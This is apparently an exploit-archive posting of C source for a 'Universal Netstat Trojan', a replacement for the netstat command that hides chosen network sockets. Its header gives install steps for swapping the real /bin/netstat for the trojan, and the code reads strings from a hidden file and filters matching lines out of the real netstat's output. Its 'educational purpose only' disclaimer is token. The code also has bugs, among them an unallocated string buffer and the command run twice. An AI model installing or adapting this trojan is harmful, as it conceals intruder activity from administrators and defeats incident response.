This tool can be used to replace netstat in order to hide network sockets on a system.
e3829d7b3011d4e902f75347e995a7775ff3c56340d79178d3b5588617fa209f
/*
* Universal Netstat Trojan Beta version
*
* !!! EDUCATIONAL PURPOSE ONLY !!!
*
* CONFIDENTIAL - SOURCE MATERIALS
*
* You are not allowed to reproduce this software without Author
* security's team permissions.
*****************************************************************************
*
* (C) COPYRIGHT Security
* All Rights Reserved
*
*****************************************************************************
*
* IDEA by Angelo Rosiello (Guilecool)
*
* CODED by Guilecool and eXedes
*
* FRIENDS DiGiT by ADM, dekadish and anakata
*
* LAMERS MrHarley and all #mrharley ppl, euge, [LuNa]
*
* HOW TO USE ?
*
* 1) #define LISTOFITEMS "/tmp/.sysproc"
* Put here the strings yout to be hidden, you must create it by your self!
*
* 2) #define TMPOUTFILE "/tmp/.tmp"
* If you wish u can change the TMPOUTFILE but it's not needed.
*
* Compile the file
* Move the real /bin/netstat in /usr/bin/netstat
* Put netstatx in /bin
* For example :
* #gcc netstatx.c -o netstatx
* #mv /bin/netstat /usr/bin/netstat
* #mv netstatx /bin/netstat
*
* There you go!
*
* Good bye ;>
*
* DO Not Hack, that's stupid ;>
*
* PS: Italian--->
* L'autore si manleva da ogni responsabilità circa l'uso che terzi possono fare
* del programma in questione. Il programma nasce come esempio di strumento atto
* a nascondere delle stringhe dallo Standard Output.
* CONSIGLIO: Non hackate, è stupido :>
*/
#include <unistd.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <string.h>
#include <stdio.h>
#include <string.h>
#include <stdio.h>
#include <stdlib.h>
#include <ctype.h>
#define READBUFFERLEN 512
#define LISTOFITEMS "/tmp/.sysproc" //this is the file where u have to put the strings u wish to be hidden
#define TMPOUTFILE "/tmp/.tmp" //U can modify here, if u want
#define new(p) ( p * )malloc(sizeof ( p ))
unsigned char filter (char *big , char *lil ) ;
// Hiding
struct ItemList
{
char *item ;
struct ItemList *next ;
} ;
// Aggiunge una stringa di path alla lista
// Ritorna 0 se c'e' errore
// 1 altrimenti
unsigned char AddItemToHide (struct ItemList **p, char *str)
{
struct ItemList *ptr ;
unsigned int len ;
if (!str)
return 0 ;
ptr = new ( struct ItemList ) ;
ptr->next = *p ;
len = strlen(str) ;
ptr->item = (char *) malloc (len-1) ;
strncpy(ptr->item,str,len-1);
*p = ptr ;
return 1 ;
}
// Distruttore della lista
void Destroy (struct ItemList **p)
{
if (!(*p))
return ;
if ((*p)->next)
{
free((*p)->item) ;
Destroy(&((*p)->next)) ;
}
free (*p) ;
}
// Trova un item nella lista * non serve x ora :)
unsigned int FindItem ( struct ItemList *p , char *item )
{
struct ItemList *ptr ;
int len ;
if ( !p || !item )
return 0 ;
ptr = p ;
while (ptr)
{
if ( !strcmp(item,ptr->item) )
return 1 ;
ptr = ptr->next ;
}
return 0 ;
}
// carica il conenuto del file puntato da path
// nella struttura puntata da p
// ritorna i files nascosti in caso di successo , 0 altrimenti
unsigned long LoadHideList (char *path, struct ItemList **p )
{
FILE *fp ;
char buffer[READBUFFERLEN] ;
unsigned long count = 0 ;
fp = fopen (path,"r") ;
// se non trovo il file
if ( !fp )
{
printf ("*file not found* : %s\n",path ) ;
return 0 ;
}
while ( !feof ( fp ) )
{
++count ;
fscanf(fp,"%s",buffer );
if ( !isspace ( *buffer ) )
AddItemToHide( p , buffer ) ;
}
fclose(fp) ;
if ( !count )
return 0 ;
else
return count ;
}
// ritorna 1 se la stringa lil e presente in big in forma intera
// Non utilizzato qui :)
unsigned char filter (char *big , char *lil )
{
char *ptr ; // pointer to the first occurance
char end ;
char begin ;
unsigned char rc ;
if ( !big || ! lil )
return 0 ;
ptr = strstr(big,lil) ;
if ( !ptr )
rc = 0 ;
else
{
// se e' l'ultima della riga
end = *(ptr+strlen(lil)) ;
if ( end == '\n' || end == 0x20 || end == 0)
{
if ( ptr != big )
{
begin = *( ptr - 1 ) ;
if ( begin == 0x20 )
rc = 1 ;
else
rc = 0 ;
}
else
rc = 1 ;
}
else
rc = 0 ;
}
return rc ;
}
int main (int argc, char **argv)
{
pid_t pid ;
int i ;
int len=0 ;
int c ;
int size ;
FILE *fp ;
char *strcmd ;
char buffer[READBUFFERLEN] ;
unsigned char found ;
struct ItemList *ItemsToHide = NULL ;
struct ItemList *ptr = NULL ;
// Rikostruisco la lista delle variabili
// rakkatto la dimensione totale della stringa di comando
for ( i = 1 ;i < argc ; i ++ )
len += strlen( argv[i] ) + 1 ;
len += strlen ( "/usr/bin/netstat " );
// e qui la creo
size = ( len + 4 + strlen(TMPOUTFILE) ) * sizeof(char) ;
strcmd = ( char * ) malloc ( size ) ;
strcat ( strcmd , "/usr/bin/netstat " );
for ( i = 1 ; i < argc ; i ++ )
strcat(strcmd,argv[i]);
strcat ( strcmd , " > " ) ;
strcat ( strcmd , TMPOUTFILE ) ;
system ( strcmd );
c = system ( strcmd );
if ( c<0 )
{
system ( "rm /tmp/.tmp" );
return;
}
//carico gli Item da Hidare
LoadHideList (LISTOFITEMS,&ItemsToHide) ;
fp = fopen ( TMPOUTFILE , "r" ) ;
if (!fp)
exit(0);
while (!feof(fp))
{
ptr = ItemsToHide ;
fgets ( buffer , READBUFFERLEN , fp );
for ( found = 0 ; ptr ; ptr = ptr -> next )
if ( strstr ( buffer , ptr->item) )
{
found = 1 ;
break ;
}
if ( ! found )
printf ( "%s",buffer ) ;
}
fclose (fp) ;
system ( "rm /tmp/.tmp" );
free ( strcmd ) ;
if ( ItemsToHide )
Destroy(&ItemsToHide) ;
}